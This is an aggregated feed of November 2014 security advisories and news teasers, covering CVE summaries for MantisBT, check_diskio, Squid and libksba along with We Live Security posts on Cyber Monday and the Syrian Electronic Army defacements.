The check_diskio plugin 3.2.6 and earlier for Nagios and Icinga allows local users to write to arbitrary files via a symlink attack on a temporary file with a predictable name (tmp/check_diskio_status-*-*).
Monthly Archives: November 2014
CVE-2014-9089 (mantisbt)
Multiple SQL injection vulnerabilities in view_all_bug_page.php in MantisBT before 1.2.18 allow remote attackers to execute arbitrary SQL commands via the (1) sort or (2) dir parameter to view_all_set.php.
Infographic: Cyber Monday – Everything you need to know
Cyber Monday is one of the biggest shopping days in the year, and in 2013 a massive $2.3bn was spent on shoppers getting their Christmas bargains in. Where this kind of money is flowing, cybercriminals are also around though, as this infographic shows.
The post Infographic: Cyber Monday – Everything you need to know appeared first on We Live Security.
News websites hacked with ‘Syrian Electronic Army’ pop-up
A Thanksgiving attack across many Western news and information websites left visitors facing javascript pop-ups telling them they had been hacked by the Syrian Electronic Army, according to CNET.
The post News websites hacked with ‘Syrian Electronic Army’ pop-up appeared first on We Live Security.
FileVista Path Leakage / Path Write Modification
FileVista versions prior to 6.1 leak internal path data and allow extraction outside of the stated path.
Gamer PCs – how to keep yours clean and mean
Gamers have become major targets for hackers – from large-scale attacks against gaming companies, to small-scale scams carried out via game chat channels. But a few easy security steps should help keep your precious rig at full speed – and safe.
The post Gamer PCs – how to keep yours clean and mean appeared first on We Live Security.
Gentoo Linux Security Advisory 201411-11
Gentoo Linux Security Advisory 201411-11 – Multiple vulnerabilities have been found in Squid, allowing remote attackers to execute arbitrary code or cause a Denial of Service condition. Versions less than 3.3.13-r1 are affected.
Debian Security Advisory 3078-1
Debian Linux Security Advisory 3078-1 – An integer underflow flaw, leading to a heap-based buffer overflow, was found in the ksba_oid_to_str() function of libksba, an X.509 and CMS (PKCS#7) library. By using special crafted S/MIME messages or ECC based OpenPGP data, it is possible to create a buffer overflow, which could cause an application using libksba to crash (denial of service), or potentially, execute arbitrary code.
Mandriva Linux Security Advisory 2014-235
Mandriva Linux Security Advisory 2014-235 – Plack::App::File would previously strip trailing slashes off provided paths. This in combination with the common pattern of serving files with Plack::Middleware::Static could allow an attacker to bypass a whitelist of generated files.
Mandriva Linux Security Advisory 2014-234
Mandriva Linux Security Advisory 2014-234 – Updated libksba packages fix a security vulnerability. By using special crafted S/MIME messages or ECC based OpenPGP data, it is possible to create a buffer overflow, which could lead to a denial of service.